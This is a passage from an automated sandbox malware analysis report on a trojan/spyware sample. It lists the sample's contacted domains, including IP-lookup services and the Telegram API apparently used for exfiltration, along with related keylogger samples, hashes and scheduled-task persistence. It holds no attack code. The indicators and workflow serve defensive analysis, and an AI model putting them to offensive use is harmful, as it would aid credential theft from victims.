                        https://reallyfreegeoip.org/xml/8.46.123.33$rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003088000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000307B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000302B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003096000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002943000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000289E000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://microsoft.corPO0977-6745.exe, 0000000A.00000002.3699929015.0000000006720000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://checkip.dyndns.orghEDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://checkip.dyndns.org/qrPO0977-6745.exe, 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://tempuri.org/DataSet1.xsdrPO0977-6745.exe, EDyxAgkldisLe.exe.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://reallyfreegeoip.orgrPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003088000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000307B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003096000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003000000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002943000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002873000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://reallyfreegeoip.orgrPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003088000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000307B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000302B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003096000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002943000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000289E000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000285B000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://checkip.dyndns.orgrPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FDC000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003088000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000307B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000302B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003096000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002943000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000284F000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002924000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000289E000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000285B000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://checkip.dyndns.comrPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003088000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000307B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003096000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002943000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000285B000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://api.telegram.orgrPO0977-6745.exe, 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerPO0977-6745.exe, 00000000.00000002.1265411156.0000000003191000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 0000000B.00000002.1306085363.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002791000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://reallyfreegeoip.org/xml/rPO0977-6745.exe, 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000285B000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        149.154.167.220
                        api.telegram.orgUnited Kingdom
                        62041TELEGRAMRUtrue
                        188.114.97.3
                        reallyfreegeoip.orgEuropean Union
                        13335CLOUDFLARENETUStrue
                        158.101.44.242
                        checkip.dyndns.comUnited States
                        31898ORACLE-BMC-31898USfalse
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1480082
                        Start date and time:2024-07-24 15:07:25 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 10m 42s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:31
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:rPO0977-6745.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@21/15@4/3
                        EGA Information:
                        • Successful, ratio: 50%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 287
                        • Number of non-executed functions: 16
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target EDyxAgkldisLe.exe, PID 8004 because it is empty
                        • Execution Graph export aborted for target rPO0977-6745.exe, PID 2916 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • VT rate limit hit for: rPO0977-6745.exe
                        TimeTypeDescription
                        09:08:16API Interceptor8930141x Sleep call for process: rPO0977-6745.exe modified
                        09:08:18API Interceptor30x Sleep call for process: powershell.exe modified
                        09:08:20API Interceptor6798143x Sleep call for process: EDyxAgkldisLe.exe modified
                        15:08:18Task SchedulerRun new task: EDyxAgkldisLe path: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        149.154.167.220z23RevisedInvoice.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                          Updated PI.exeGet hashmaliciousAgentTesla, RedLineBrowse
                            rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                              231210-06-AgentTesla-9da180.exeGet hashmaliciousAgentTeslaBrowse
                                SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    Purchase Order.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                      List & Sample_Doc3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                        Confirmation transfer Copy AGS # 24-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          Apixaban - August 2024.XLS.exeGet hashmaliciousSnake KeyloggerBrowse
                                            188.114.97.3Quotation.xlsGet hashmaliciousRemcosBrowse
                                            • tny.wtf/jk8Z5I
                                            NUEVO ORDEN01_202407238454854.pdf.exeGet hashmaliciousFormBookBrowse
                                            • www.010101-11122-2222.cloud/rn94/?ndsLnTq=grMJGHTOpxQfD2iixWctBZvhCYtmqSbLUJDCoaQDnQJ3Rh8vFQmgv7kvDLvYcoaVSk1M&pPO=DFQxUrcpRxVH
                                            DRAFT AWB and DRAFT Commercial invoice.xlsGet hashmaliciousRemcosBrowse
                                            • tny.wtf/cyd
                                            QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                            • filetransfer.io/data-package/4jaIXkvS/download
                                            QUOTATION_JULQTRA071244.PDF.scr.exeGet hashmaliciousUnknownBrowse
                                            • filetransfer.io/data-package/PM6yPStj/download
                                            QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                            • filetransfer.io/data-package/0DmcWsUI/download
                                            QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                            • filetransfer.io/data-package/4jaIXkvS/download
                                            QUOTATION_JULQTRA071244.PDF.scr.exeGet hashmaliciousUnknownBrowse
                                            • filetransfer.io/data-package/PM6yPStj/download
                                            Purchase Order - P04737.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • tny.wtf/Dl
                                            #U00d6deme kopyas#U0131.xlsGet hashmaliciousRemcosBrowse
                                            • tny.wtf/
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            reallyfreegeoip.orgz1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 172.67.177.134
                                            rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.96.3
                                            SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.96.3
                                            Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.96.3
                                            SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.96.3
                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.96.3
                                            Purchase Order.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                            • 188.114.96.3
                                            List & Sample_Doc3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 188.114.97.3
                                            Confirmation transfer Copy AGS # 24-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 188.114.97.3
                                            Apixaban - August 2024.XLS.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.96.3
                                            checkip.dyndns.comz1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 158.101.44.242
                                            rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                            • 158.101.44.242
                                            rRFQ_025261-97382.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 158.101.44.242
                                            SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 132.226.247.73
                                            Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 132.226.247.73
                                            SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 132.226.8.169
                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                                            • 193.122.6.168
                                            Purchase Order.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                            • 132.226.247.73
                                            List & Sample_Doc3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 158.101.44.242
                                            Confirmation transfer Copy AGS # 24-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 193.122.6.168
                                            api.telegram.orgz23RevisedInvoice.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                            • 149.154.167.220
                                            Updated PI.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                            • 149.154.167.220
                                            rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            231210-06-AgentTesla-9da180.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            Purchase Order.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                            • 149.154.167.220
                                            List & Sample_Doc3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 149.154.167.220
                                            Confirmation transfer Copy AGS # 24-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 149.154.167.220
                                            Apixaban - August 2024.XLS.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 149.154.167.220
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            TELEGRAMRUz23RevisedInvoice.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                            • 149.154.167.220
                                            Updated PI.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                            • 149.154.167.220
                                            rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            231210-06-AgentTesla-9da180.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            Purchase Order.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                            • 149.154.167.220
                                            List & Sample_Doc3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 149.154.167.220
                                            Confirmation transfer Copy AGS # 24-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 149.154.167.220
                                            Apixaban - August 2024.XLS.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 149.154.167.220
                                            CLOUDFLARENETUShttps://0f34q.n8xgn.com/0f34Q/&design=DAGL1KVwhx0&accessRole=viewer&linkSource=documentGet hashmaliciousUnknownBrowse
                                            • 104.21.95.143
                                            https://jul-fat.s3.us-east-2.amazonaws.com/Comprovativo_Julho_ilxtf_11-07-2024_17.zip?=CBJWEMFPSBTBJTCWJMMHXOTTZAUEUJDNBHBGDALULXNCKKLTVEMGSERPIRBESAUHZGABRXVIASXKAQTZPAJPZXVXRNWNKFBJCEFTKICKJDGKIROSZDPSRFJBLDLDZHIVRMZXLKWFZLEUQVOKKGPVRITXUDIVWWBBUMIXTRGWFJUGAQLPQLERTODHTGet hashmaliciousUnknownBrowse
                                            • 1.1.1.1
                                            Sync_Approval_Document.htmlGet hashmaliciousHTMLPhisherBrowse
                                            • 104.17.24.14
                                            z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 172.67.177.134
                                            rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.96.3
                                            Fw PROPOSITION DE BELGOSUC.emlGet hashmaliciousSharepointPhisherBrowse
                                            • 188.114.97.3
                                            roquette.com PURCHASE ORDER.htmGet hashmaliciousUnknownBrowse
                                            • 188.114.96.3
                                            ELECTRONIC RECEIPTGrba.htmlGet hashmaliciousUnknownBrowse
                                            • 188.114.96.3
                                            https://www.canva.com/design/DAGL1KVwhx0/GKVImkBFgqHp2esQ4hZ4Gg/editGet hashmaliciousUnknownBrowse
                                            • 172.67.74.152
                                            Sync_Approval_Document.htmlGet hashmaliciousHTMLPhisherBrowse
                                            • 104.17.25.14
                                            ORACLE-BMC-31898USz1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 158.101.44.242
                                            rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                            • 158.101.44.242
                                            rRFQ_025261-97382.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 158.101.44.242
                                            SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 158.101.44.242
                                            Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 193.122.130.0
                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                                            • 158.101.44.242
                                            List & Sample_Doc3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 158.101.44.242
                                            Confirmation transfer Copy AGS # 24-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 193.122.6.168
                                            Apixaban - August 2024.XLS.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 158.101.44.242
                                            SMLCHtAAMK.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 193.122.130.0
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            54328bd36c14bd82ddaa0c04b25ed9adrcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.97.3
                                            Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.97.3
                                            SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.97.3
                                            afRggioa9s.exeGet hashmaliciousUnknownBrowse
                                            • 188.114.97.3
                                            afRggioa9s.exeGet hashmaliciousUnknownBrowse
                                            • 188.114.97.3
                                            Purchase Order.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                            • 188.114.97.3
                                            List & Sample_Doc3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 188.114.97.3
                                            Confirmation transfer Copy AGS # 24-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 188.114.97.3
                                            Apixaban - August 2024.XLS.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.97.3
                                            SMLCHtAAMK.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.97.3
                                            3b5074b1b5d032e5620f69f9f700ff0e2A7EDCA327F4C5D10592B4B75A7CE8B394553F18BF975C46B3FE76306D146FAE.exeGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            Sync_Approval_Document.htmlGet hashmaliciousHTMLPhisherBrowse
                                            • 149.154.167.220
                                            Updated PI.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                            • 149.154.167.220
                                            z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 149.154.167.220
                                            rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            roquette.com PURCHASE ORDER.htmGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            nJC3400-GS SICO NEW ORLEANS.pif.exeGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            abrirpdf_45868.msiGet hashmaliciousHTMLPhisherBrowse
                                            • 149.154.167.220
                                            231210-06-AgentTesla-9da180.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            231210-04-AgentTesla-38a0d6.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            No context
                                            Process:C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                            Process:C:\Users\user\Desktop\rPO0977-6745.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
